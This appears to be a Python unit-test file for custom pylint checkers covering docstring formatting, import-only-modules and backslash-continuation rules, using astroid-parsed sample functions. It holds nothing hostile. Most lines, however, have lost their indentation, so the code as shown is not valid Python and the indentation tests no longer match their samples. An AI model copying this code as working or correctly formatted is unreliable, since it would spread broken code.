msg_id='newline-below-class-docstring',
node=node_multiline_class_argument_with_incorrect_style)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
def test_multiline_class_argument_with_correct_style(self):
node_multiline_class_argument_with_correct_style = (
astroid.scoped_nodes.Module(
name='test',
doc='Custom test'))
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
class ClassName(
dummy_class):
\"\"\"This is a docstring.\"\"\"
a = 1 + 2
""")
node_multiline_class_argument_with_correct_style.file = filename
node_multiline_class_argument_with_correct_style.path = filename
self.checker_test_object.checker.visit_classdef(
node_multiline_class_argument_with_correct_style)
with self.checker_test_object.assertNoMessages():
temp_file.close()
def test_single_newline_below_class_docstring(self):
node_with_no_error_message = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
class ClassName(dummy_class):
\"\"\"This is a multiline docstring.\"\"\"
a = 1 + 2
""")
node_with_no_error_message.file = filename
node_with_no_error_message.path = filename
self.checker_test_object.checker.visit_classdef(
node_with_no_error_message)
with self.checker_test_object.assertNoMessages():
temp_file.close()
def test_class_with_no_docstring(self):
node_class_with_no_docstring = astroid.scoped_nodes.Module(
name='test',
doc=None)
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
class ClassName(dummy_class):
a = 1 + 2
""")
node_class_with_no_docstring.file = filename
node_class_with_no_docstring.path = filename
self.checker_test_object.checker.visit_classdef(
node_class_with_no_docstring)
with self.checker_test_object.assertNoMessages():
temp_file.close()
def test_newline_before_docstring_with_correct_style(self):
node_newline_before_docstring_with_correct_style = (
astroid.scoped_nodes.Module(
name='test',
doc='Custom test'))
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
class ClassName(dummy_class):
\"\"\"This is a multiline docstring.\"\"\"
a = 1 + 2
""")
node_newline_before_docstring_with_correct_style.file = filename
node_newline_before_docstring_with_correct_style.path = filename
self.checker_test_object.checker.visit_classdef(
node_newline_before_docstring_with_correct_style)
with self.checker_test_object.assertNoMessages():
temp_file.close()
def test_newline_before_docstring_with_incorrect_style(self):
node_newline_before_docstring_with_incorrect_style = (
astroid.scoped_nodes.Module(
name='test',
doc='Custom test'))
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
class ClassName(dummy_class):
\"\"\"This is a multiline docstring.\"\"\"
a = 1 + 2
""")
node_newline_before_docstring_with_incorrect_style.file = filename
node_newline_before_docstring_with_incorrect_style.path = filename
self.checker_test_object.checker.visit_classdef(
node_newline_before_docstring_with_incorrect_style)
message = testutils.Message(
msg_id='newline-below-class-docstring',
node=node_newline_before_docstring_with_incorrect_style)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
def test_malformed_args_section(self):
node_malformed_args_section = astroid.extract_node(
u"""def func(arg): #@
\"\"\"Does nothing.
Args:
arg: Argument description.
\"\"\"
a = True
""")
message = testutils.Message(
msg_id='malformed-args-section',
node=node_malformed_args_section
)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
node_malformed_args_section)
def test_malformed_returns_section(self):
node_malformed_returns_section = astroid.extract_node(
u"""def func(): #@
\"\"\"Return True.
Returns:
arg: Argument description.
\"\"\"
return True
""")
message = testutils.Message(
msg_id='malformed-returns-section',
node=node_malformed_returns_section
)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
node_malformed_returns_section)
def test_malformed_yields_section(self):
node_malformed_yields_section = astroid.extract_node(
u"""def func(): #@
\"\"\"Yield true.
Yields:
yields: Argument description.
\"\"\"
yield True
""")
message = testutils.Message(
msg_id='malformed-yields-section',
node=node_malformed_yields_section
)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
node_malformed_yields_section)
def test_malformed_raises_section(self):
node_malformed_raises_section = astroid.extract_node(
u"""def func(): #@
\"\"\"Raise an exception.
Raises:
Exception: Argument description.
\"\"\"
raise Exception()
""")
message = testutils.Message(
msg_id='malformed-raises-section',
node=node_malformed_raises_section
)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
node_malformed_raises_section)
def test_malformed_args_argument(self):
node_malformed_args_argument = astroid.extract_node(
u"""def func(*args): #@
\"\"\"Does nothing.
Args:
*args: int. Argument description.
\"\"\"
a = True
""")
message = testutils.Message(
msg_id='malformed-args-argument',
node=node_malformed_args_argument
)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
node_malformed_args_argument)
    def test_well_formatted_args_argument(self):
node_with_no_error_message = astroid.extract_node(
u"""def func(*args): #@
\"\"\"Does nothing.
Args:
*args: list(*). Description.
\"\"\"
a = True
""")
with self.checker_test_object.assertAddsMessages():
self.checker_test_object.checker.visit_functiondef(
node_with_no_error_message)
    def test_well_formatted_args_section(self):
node_with_no_error_message = astroid.extract_node(
u"""def func(arg): #@
\"\"\"Does nothing.
Args:
arg: argument. Description.
\"\"\"
a = True
""")
with self.checker_test_object.assertAddsMessages():
self.checker_test_object.checker.visit_functiondef(
node_with_no_error_message)
    def test_well_formatted_returns_section(self):
node_with_no_error_message = astroid.extract_node(
u"""def func(): #@
\"\"\"Does nothing.
Returns:
                    int. Argument description.
\"\"\"
return args
""")
with self.checker_test_object.assertAddsMessages():
self.checker_test_object.checker.visit_functiondef(
node_with_no_error_message)
    def test_well_formatted_yields_section(self):
node_with_no_error_message = astroid.extract_node(
u"""def func(): #@
\"\"\"Does nothing.
Yields:
arg. Argument description.
\"\"\"
yield args
""")
with self.checker_test_object.assertAddsMessages():
self.checker_test_object.checker.visit_functiondef(
node_with_no_error_message)
def test_space_after_docstring(self):
node_space_after_docstring = astroid.extract_node(
u"""def func():
\"\"\" Hello world.\"\"\"
Something
""")
message = testutils.Message(
msg_id='space-after-triple-quote',
node=node_space_after_docstring)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
node_space_after_docstring)
def test_single_line_docstring_span_two_lines(self):
node_single_line_docstring_span_two_lines = astroid.extract_node(
u"""def func(): #@
\"\"\"This is a docstring.
\"\"\"
Something
""")
message = testutils.Message(
msg_id='single-line-docstring-span-two-lines',
node=node_single_line_docstring_span_two_lines)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
node_single_line_docstring_span_two_lines)
def test_no_period_at_end(self):
node_no_period_at_end = astroid.extract_node(
u"""def func(): #@
\"\"\"This is a docstring\"\"\"
Something
""")
message = testutils.Message(
msg_id='no-period-used',
node=node_no_period_at_end)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
node_no_period_at_end)
def test_empty_line_before_end_of_docstring(self):
node_empty_line_before_end = astroid.extract_node(
u"""def func(): #@
\"\"\"This is a docstring.
\"\"\"
Something
""")
message = testutils.Message(
msg_id='empty-line-before-end', node=node_empty_line_before_end)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
node_empty_line_before_end)
def test_no_period_at_end_of_a_multiline_docstring(self):
node_no_period_at_end = astroid.extract_node(
u"""def func(arg): #@
\"\"\"This is a docstring.
Args:
                    arg: variable. Description
\"\"\"
Something
""")
no_period_at_end_message = testutils.Message(
msg_id='no-period-used', node=node_no_period_at_end)
malformed_args_message = testutils.Message(
msg_id='malformed-args-section', node=node_no_period_at_end)
with self.checker_test_object.assertAddsMessages(
no_period_at_end_message, malformed_args_message):
self.checker_test_object.checker.visit_functiondef(
node_no_period_at_end)
def test_no_newline_at_end_of_multi_line_docstring(self):
node_no_newline_at_end = astroid.extract_node(
u"""def func(arg): #@
\"\"\"This is a docstring.
Args:
arg: variable. Description.\"\"\"
Something
""")
message = testutils.Message(
msg_id='no-newline-used-at-end', node=node_no_newline_at_end)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
node_no_newline_at_end)
def test_no_newline_above_args(self):
node_single_newline_above_args = astroid.extract_node(
u"""def func(arg): #@
\"\"\"Do something.
Args:
arg: argument. Description.
\"\"\"
""")
message = testutils.Message(
msg_id='single-space-above-args',
node=node_single_newline_above_args)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
node_single_newline_above_args)
def test_no_newline_above_raises(self):
node_single_newline_above_raises = astroid.extract_node(
u"""def func(): #@
\"\"\"Raises exception.
Raises:
raises_exception. Description.
\"\"\"
raise exception
""")
message = testutils.Message(
msg_id='single-space-above-raises',
node=node_single_newline_above_raises
)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
node_single_newline_above_raises)
def test_no_newline_above_return(self):
node_with_no_space_above_return = astroid.extract_node(
u"""def func(): #@
\"\"\"Returns something.
Returns:
returns_something. Description.
\"\"\"
return something
""")
message = testutils.Message(
msg_id='single-space-above-returns',
node=node_with_no_space_above_return
)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
node_with_no_space_above_return)
def test_varying_combination_of_newline_above_args(self):
node_newline_above_args_raises = astroid.extract_node(
u"""def func(arg): #@
\"\"\"Raises exception.
Args:
arg: argument. Description.
Raises:
raises_something. Description.
\"\"\"
raise exception
""")
message = testutils.Message(
msg_id='single-space-above-raises',
node=node_newline_above_args_raises
)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
node_newline_above_args_raises)
node_newline_above_args_returns = astroid.extract_node(
u"""def func(arg): #@
\"\"\"Returns Something.
Args:
arg: argument. Description.
Returns:
returns_something. Description.
\"\"\"
return something
""")
message = testutils.Message(
msg_id='single-space-above-returns',
node=node_newline_above_args_returns
)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
node_newline_above_args_returns)
node_newline_above_returns_raises = astroid.extract_node(
u"""def func(): #@
\"\"\"Do something.
Raises:
raises_exception. Description.
Returns:
returns_something. Description.
\"\"\"
raise something
return something
""")
message = testutils.Message(
msg_id='single-space-above-raises',
node=node_newline_above_returns_raises
)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
node_newline_above_returns_raises)
def test_excessive_newline_above_args(self):
node_with_two_newline = astroid.extract_node(
u"""def func(arg): #@
\"\"\"Returns something.
Args:
arg: argument. This is description.
Returns:
int. Returns something.
Yields:
yield_something. Description.
\"\"\"
return True
yield something
""")
single_space_above_args_message = testutils.Message(
msg_id='single-space-above-args',
node=node_with_two_newline
)
single_space_above_returns_message = testutils.Message(
msg_id='single-space-above-returns',
node=node_with_two_newline
)
single_space_above_yields_message = testutils.Message(
msg_id='single-space-above-yield',
node=node_with_two_newline
)
with self.checker_test_object.assertAddsMessages(
single_space_above_args_message, single_space_above_returns_message,
single_space_above_yields_message):
self.checker_test_object.checker.visit_functiondef(
node_with_two_newline)
def test_return_in_comment(self):
node_with_return_in_comment = astroid.extract_node(
u"""def func(arg): #@
\"\"\"Returns something.
Args:
arg: argument. Description.
Returns:
returns_something. Description.
\"\"\"
"Returns: something"
return something
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_functiondef(
node_with_return_in_comment)
def test_function_with_no_args(self):
node_with_no_args = astroid.extract_node(
u"""def func():
\"\"\"Do something.\"\"\"
a = 1 + 2
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_functiondef(
node_with_no_args)
def test_well_placed_newline(self):
node_with_no_error_message = astroid.extract_node(
u"""def func(arg): #@
\"\"\"Returns something.
Args:
arg: argument. This is description.
Returns:
returns_something. This is description.
Raises:
raises. Something.
Yields:
yield_something. This is description.
\"\"\"
raise something
yield something
return something
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_functiondef(
node_with_no_error_message)
def test_invalid_parameter_indentation_in_docstring(self):
raises_invalid_indentation_node = astroid.extract_node(
u"""def func(arg): #@
\"\"\"This is a docstring.
Raises:
NoVariableException. Variable.
\"\"\"
Something
""")
message = testutils.Message(
msg_id='4-space-indentation-in-docstring',
node=raises_invalid_indentation_node)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
raises_invalid_indentation_node)
return_invalid_indentation_node = astroid.extract_node(
u"""def func(arg): #@
\"\"\"This is a docstring.
Returns:
str. If :true,
individual key=value pairs.
\"\"\"
Something
""")
message = testutils.Message(
msg_id='4-space-indentation-in-docstring',
node=return_invalid_indentation_node)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
return_invalid_indentation_node)
def test_invalid_description_indentation_docstring(self):
invalid_raises_description_indentation_node = astroid.extract_node(
u"""def func(arg): #@
\"\"\"This is a docstring.
Raises:
AssertionError. If the
schema is not valid.
\"\"\"
Something
""")
incorrect_indentation_message = testutils.Message(
msg_id='8-space-indentation-in-docstring',
node=invalid_raises_description_indentation_node)
malformed_raises_message = testutils.Message(
msg_id='malformed-raises-section',
node=invalid_raises_description_indentation_node)
with self.checker_test_object.assertAddsMessages(
incorrect_indentation_message, malformed_raises_message,
malformed_raises_message):
self.checker_test_object.checker.visit_functiondef(
invalid_raises_description_indentation_node)
invalid_return_description_indentation_node = astroid.extract_node(
u"""def func(arg): #@
\"\"\"This is a docstring.
Returns:
str. If :true,
individual key=value pairs.
\"\"\"
return Something
""")
message = testutils.Message(
msg_id='4-space-indentation-in-docstring',
node=invalid_return_description_indentation_node)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
invalid_return_description_indentation_node)
invalid_yield_description_indentation_node = astroid.extract_node(
u"""def func(arg): #@
\"\"\"This is a docstring.
Yields:
str. If :true,
                    incorrect indentation line.
\"\"\"
yield Something
""")
message = testutils.Message(
msg_id='4-space-indentation-in-docstring',
node=invalid_yield_description_indentation_node)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
invalid_yield_description_indentation_node)
def test_malformed_parameter_docstring(self):
invalid_parameter_name = astroid.extract_node(
u"""def func(arg): #@
\"\"\"This is a docstring.
Raises:
Incorrect-Exception. If the
schema is not valid.
\"\"\"
Something
""")
malformed_raises_message = testutils.Message(
msg_id='malformed-raises-section',
node=invalid_parameter_name)
with self.checker_test_object.assertAddsMessages(
malformed_raises_message, malformed_raises_message):
self.checker_test_object.checker.visit_functiondef(
invalid_parameter_name)
def test_well_formed_single_line_docstring(self):
node_with_no_error_message = astroid.extract_node(
u"""def func(arg): #@
\"\"\"This is a docstring.\"\"\"
Something
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_functiondef(
node_with_no_error_message)
def test_well_formed_multi_line_docstring(self):
node_with_no_error_message = astroid.extract_node(
u"""def func(arg): #@
\"\"\"This is a docstring.
Args:
arg: variable. Description.
\"\"\"
Something
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_functiondef(
node_with_no_error_message)
def test_well_formed_multi_line_description_docstring(self):
node_with_no_error_message = astroid.extract_node(
u"""def func(arg): #@
\"\"\"This is a docstring.
Args:
arg: bool. If true, individual key=value
pairs separated by '&' are
generated for each element of the value
sequence for the key.
\"\"\"
Something
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_functiondef(
node_with_no_error_message)
node_with_no_error_message = astroid.extract_node(
u"""def func(arg): #@
\"\"\"This is a docstring.
Raises:
doseq. If true, individual
key=value pairs separated by '&' are
generated for each element of
the value sequence for the key
temp temp temp temp.
query. The query to be encoded.
\"\"\"
Something
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_functiondef(
node_with_no_error_message)
node_with_no_error_message = astroid.extract_node(
u"""def func(arg):
\"\"\"This is a docstring.
Returns:
str. The string parsed using
Jinja templating. Returns an error
string in case of error in parsing.
Yields:
tuple. For ExplorationStatsModel,
a 2-tuple of the form (exp_id, value)
where value is of the form.
\"\"\"
if True:
return Something
else:
yield something
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_functiondef(
node_with_no_error_message)
node_with_no_error_message = astroid.extract_node(
u"""def func(arg): #@
\"\"\"This is a docstring.
Returns:
str. From this item there
is things:
Jinja templating. Returns an error
string in case of error in parsing.
Yields:
tuple. For ExplorationStatsModel:
{key
(sym)
}.
\"\"\"
if True:
return Something
else:
yield (a, b)
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_functiondef(
node_with_no_error_message)
def test_checks_args_formatting_docstring(self):
self.checker_test_object = testutils.CheckerTestCase()
self.checker_test_object.CHECKER_CLASS = (
pylint_extensions.DocstringParameterChecker)
self.checker_test_object.setup_method()
invalid_args_description_node = astroid.extract_node(
"""
def func(test_var_one, test_var_two): #@
\"\"\"Function to test docstring parameters.
Args:
test_var_one: int. First test variable.
test_var_two: str. Second test variable.
Incorrect description indentation
Returns:
int. The test result.
\"\"\"
result = test_var_one + test_var_two
return result
""")
with self.checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='8-space-indentation-for-arg-in-descriptions-doc',
node=invalid_args_description_node,
args='Incorrect'
),
testutils.Message(
msg_id='malformed-args-section',
node=invalid_args_description_node,
)
):
self.checker_test_object.checker.visit_functiondef(
invalid_args_description_node)
invalid_param_indentation_node = astroid.extract_node(
"""
def func(test_var_one): #@
\"\"\"Function to test docstring parameters.
Args:
test_var_one: int. First test variable.
Returns:
int. The test result.
\"\"\"
result = test_var_one + test_var_two
return result
""")
with self.checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='4-space-indentation-for-arg-parameters-doc',
node=invalid_param_indentation_node,
args='test_var_one:'
),
):
self.checker_test_object.checker.visit_functiondef(
invalid_param_indentation_node)
invalid_header_indentation_node = astroid.extract_node(
"""
def func(test_var_one): #@
\"\"\"Function to test docstring parameters.
Args:
test_var_one: int. First test variable.
Returns:
int. The test result.
\"\"\"
result = test_var_one + test_var_two
return result
""")
with self.checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='incorrect-indentation-for-arg-header-doc',
node=invalid_header_indentation_node,
),
):
self.checker_test_object.checker.visit_functiondef(
invalid_header_indentation_node)
def test_correct_args_formatting_docstring(self):
self.checker_test_object = testutils.CheckerTestCase()
self.checker_test_object.CHECKER_CLASS = (
pylint_extensions.DocstringParameterChecker)
self.checker_test_object.setup_method()
valid_free_form_node = astroid.extract_node(
"""
def func(test_var_one, test_var_two): #@
\"\"\"Function to test docstring parameters.
Args:
test_var_one: int. First test variable.
test_var_two: str. Second test variable:
Incorrect description indentation
{
key:
}.
Returns:
int. The test result.
\"\"\"
result = test_var_one + test_var_two
return result
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_functiondef(
valid_free_form_node)
valid_indentation_node = astroid.extract_node(
"""
def func(test_var_one, test_var_two): #@
\"\"\"Function to test docstring parameters.
Args:
test_var_one: int. First test variable.
test_var_two: str. Second test variable:
                        Correct indentation.
Returns:
int. The test result.
\"\"\"
result = test_var_one + test_var_two
return result
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_functiondef(
valid_indentation_node)
def test_finds_docstring_parameter(self):
self.checker_test_object = testutils.CheckerTestCase()
self.checker_test_object.CHECKER_CLASS = (
pylint_extensions.DocstringParameterChecker)
self.checker_test_object.setup_method()
valid_func_node, valid_return_node = astroid.extract_node(
"""
def test(test_var_one, test_var_two): #@
\"\"\"Function to test docstring parameters.
Args:
test_var_one: int. First test variable.
test_var_two: str. Second test variable.
Returns:
int. The test result.
\"\"\"
result = test_var_one + test_var_two
return result #@
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_functiondef(valid_func_node)
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_return(valid_return_node)
valid_func_node, valid_yield_node = astroid.extract_node(
"""
def test(test_var_one, test_var_two): #@
\"\"\"Function to test docstring parameters.\"\"\"
result = test_var_one + test_var_two
yield result #@
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_functiondef(valid_func_node)
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_yield(valid_yield_node)
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_return(valid_yield_node)
(
missing_yield_type_func_node,
missing_yield_type_yield_node) = astroid.extract_node(
"""
class Test(python_utils.OBJECT):
def __init__(self, test_var_one, test_var_two): #@
\"\"\"Function to test docstring parameters.
Args:
test_var_one: int. First test variable.
test_var_two: str. Second test variable.
Returns:
int. The test result.
\"\"\"
result = test_var_one + test_var_two
yield result #@
""")
with self.checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='redundant-returns-doc',
node=missing_yield_type_func_node
),
):
self.checker_test_object.checker.visit_functiondef(
missing_yield_type_func_node)
with self.checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='missing-yield-doc',
node=missing_yield_type_func_node
), testutils.Message(
msg_id='missing-yield-type-doc',
node=missing_yield_type_func_node
),
):
self.checker_test_object.checker.visit_yieldfrom(
missing_yield_type_yield_node)
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_return(
missing_yield_type_yield_node)
(
missing_return_type_func_node,
missing_return_type_return_node) = astroid.extract_node(
"""
class Test(python_utils.OBJECT):
def __init__(self, test_var_one, test_var_two): #@
\"\"\"Function to test docstring parameters.
Args:
test_var_one: int. First test variable.
test_var_two: str. Second test variable.
Yields:
int. The test result.
\"\"\"
result = test_var_one + test_var_two
return result #@
""")
with self.checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='redundant-yields-doc',
node=missing_return_type_func_node
),
):
self.checker_test_object.checker.visit_functiondef(
missing_return_type_func_node)
with self.checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='missing-return-doc',
node=missing_return_type_func_node
), testutils.Message(
msg_id='missing-return-type-doc',
node=missing_return_type_func_node
),
):
self.checker_test_object.checker.visit_return(
missing_return_type_return_node)
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_yield(
missing_return_type_return_node)
valid_raise_node = astroid.extract_node(
"""
def func(test_var_one, test_var_two):
\"\"\"Function to test docstring parameters.
Args:
test_var_one: int. First test variable.
test_var_two: str. Second test variable.
Raises:
Exception. An exception.
\"\"\"
raise Exception #@
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_raise(valid_raise_node)
(
missing_raise_type_func_node,
missing_raise_type_raise_node) = astroid.extract_node(
"""
def func(test_var_one, test_var_two): #@
\"\"\"Function to test raising exceptions.
Args:
test_var_one: int. First test variable.
test_var_two: str. Second test variable.
\"\"\"
raise Exception #@
""")
with self.checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='missing-raises-doc',
args=('Exception',),
node=missing_raise_type_func_node
),
):
self.checker_test_object.checker.visit_raise(
missing_raise_type_raise_node)
valid_raise_node = astroid.extract_node(
"""
class Test(python_utils.OBJECT):
raise Exception #@
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_raise(valid_raise_node)
valid_raise_node = astroid.extract_node(
"""
class Test():
@property
def decorator_func(self):
pass
@decorator_func.setter
@property
def func(self):
raise Exception #@
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_raise(valid_raise_node)
valid_raise_node = astroid.extract_node(
"""
class Test():
def func(self):
raise Exception #@
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_raise(valid_raise_node)
valid_raise_node = astroid.extract_node(
"""
def func():
try:
raise Exception #@
except Exception:
pass
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_raise(valid_raise_node)
valid_raise_node = astroid.extract_node(
"""
def func():
\"\"\"Function to test raising exceptions.\"\"\"
raise Exception #@
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_raise(valid_raise_node)
valid_raise_node = astroid.extract_node(
"""
def my_func(self):
\"\"\"This is a docstring.
:raises NameError: Never.
\"\"\"
def ex_func(val):
return RuntimeError(val)
raise ex_func('hi') #@
raise NameError('hi')
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_raise(valid_raise_node)
valid_raise_node = astroid.extract_node(
"""
from unknown import Unknown
def my_func(self):
\"\"\"This is a docstring.
:raises NameError: Never.
\"\"\"
raise Unknown('hi') #@
raise NameError('hi')
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_raise(valid_raise_node)
valid_raise_node = astroid.extract_node(
"""
def my_func(self):
\"\"\"This is a docstring.
:raises NameError: Never.
\"\"\"
def ex_func(val):
def inner_func(value):
return OSError(value)
return RuntimeError(val)
raise ex_func('hi') #@
raise NameError('hi')
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_raise(valid_raise_node)
valid_return_node = astroid.extract_node(
"""
def func():
\"\"\"Function to test return values.\"\"\"
return None #@
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_return(valid_return_node)
valid_return_node = astroid.extract_node(
"""
def func():
\"\"\"Function to test return values.\"\"\"
return #@
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_return(valid_return_node)
missing_param_func_node = astroid.extract_node(
"""
def func(test_var_one, test_var_two, *args, **kwargs): #@
\"\"\"Function to test docstring parameters.
Args:
test_var_one: int. First test variable.
test_var_two: str. Second test variable.
Returns:
int. The test result.
\"\"\"
result = test_var_one + test_var_two
return result
""")
with self.checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='missing-param-doc',
node=missing_param_func_node,
args=('args, kwargs',),
),
):
self.checker_test_object.checker.visit_functiondef(
missing_param_func_node)
missing_param_func_node = astroid.extract_node(
"""
def func(test_var_one, test_var_two): #@
\"\"\"Function to test docstring parameters.
Args:
test_var_one: int. First test variable.
invalid_var_name: str. Second test variable.
Returns:
int. The test result.
\"\"\"
result = test_var_one + test_var_two
return result
""")
with self.checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='missing-param-doc',
node=missing_param_func_node,
args=('test_var_two',),
), testutils.Message(
msg_id='missing-type-doc',
node=missing_param_func_node,
args=('test_var_two',),
), testutils.Message(
msg_id='differing-param-doc',
node=missing_param_func_node,
args=('invalid_var_name',),
), testutils.Message(
msg_id='differing-type-doc',
node=missing_param_func_node,
args=('invalid_var_name',),
),
testutils.Message(
msg_id='8-space-indentation-for-arg-in-descriptions-doc',
node=missing_param_func_node,
args='invalid_var_name:'
),
):
self.checker_test_object.checker.visit_functiondef(
missing_param_func_node)
class_node, multiple_constructor_func_node = astroid.extract_node(
"""
class Test(): #@
\"\"\"Function to test docstring parameters.
Args:
test_var_one: int. First test variable.
test_var_two: str. Second test variable.
Returns:
int. The test result.
\"\"\"
def __init__(self, test_var_one, test_var_two): #@
\"\"\"Function to test docstring parameters.
Args:
test_var_one: int. First test variable.
test_var_two: str. Second test variable.
Returns:
int. The test result.
\"\"\"
result = test_var_one + test_var_two
return result
""")
with self.checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='multiple-constructor-doc',
node=class_node,
args=(class_node.name,),
),
):
self.checker_test_object.checker.visit_functiondef(
multiple_constructor_func_node)
def test_visit_raise_warns_unknown_style(self):
self.checker_test_object.checker.config.accept_no_raise_doc = False
node = astroid.extract_node(
"""
def my_func(self):
\"\"\"This is a docstring.\"\"\"
raise RuntimeError('hi')
""")
raise_node = node.body[0]
func_node = raise_node.frame()
with self.checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='missing-raises-doc',
args=('RuntimeError',),
node=func_node
),
):
self.checker_test_object.checker.visit_raise(raise_node)
class ImportOnlyModulesCheckerTests(unittest.TestCase):
def test_finds_import_from(self):
checker_test_object = testutils.CheckerTestCase()
checker_test_object.CHECKER_CLASS = (
pylint_extensions.ImportOnlyModulesChecker)
checker_test_object.setup_method()
importfrom_node1 = astroid.extract_node(
"""
from os import path #@
import sys
""")
with checker_test_object.assertNoMessages():
checker_test_object.checker.visit_importfrom(importfrom_node1)
importfrom_node2 = astroid.extract_node(
"""
from os import error #@
import sys
""")
with checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='import-only-modules',
node=importfrom_node2,
args=('error', 'os')
),
):
checker_test_object.checker.visit_importfrom(
importfrom_node2)
importfrom_node3 = astroid.extract_node(
"""
from invalid_module import invalid_module #@
""")
with checker_test_object.assertNoMessages():
checker_test_object.checker.visit_importfrom(importfrom_node3)
importfrom_node4 = astroid.extract_node(
"""
from constants import constants #@
""")
with checker_test_object.assertNoMessages():
checker_test_object.checker.visit_importfrom(importfrom_node4)
importfrom_node5 = astroid.extract_node(
"""
from os import invalid_module #@
""")
with checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='import-only-modules',
node=importfrom_node5,
args=('invalid_module', 'os')
),
):
checker_test_object.checker.visit_importfrom(importfrom_node5)
importfrom_node6 = astroid.extract_node(
"""
from .constants import constants #@
""", module_name='.constants')
with checker_test_object.assertNoMessages():
checker_test_object.checker.visit_importfrom(importfrom_node6)
class BackslashContinuationCheckerTests(unittest.TestCase):
def test_finds_backslash_continuation(self):
checker_test_object = testutils.CheckerTestCase()
checker_test_object.CHECKER_CLASS = (
pylint_extensions.BackslashContinuationChecker)
checker_test_object.setup_method()
node = astroid.scoped_nodes.Module(name='test', doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""message1 = 'abc'\\\n""" # pylint: disable=backslash-continuation
"""'cde'\\\n""" # pylint: disable=backslash-continuation
"""'xyz'
message2 = 'abc\\\\'
message3 = (
'abc\\\\'
'xyz\\\\'
)
""")
node.file = filename
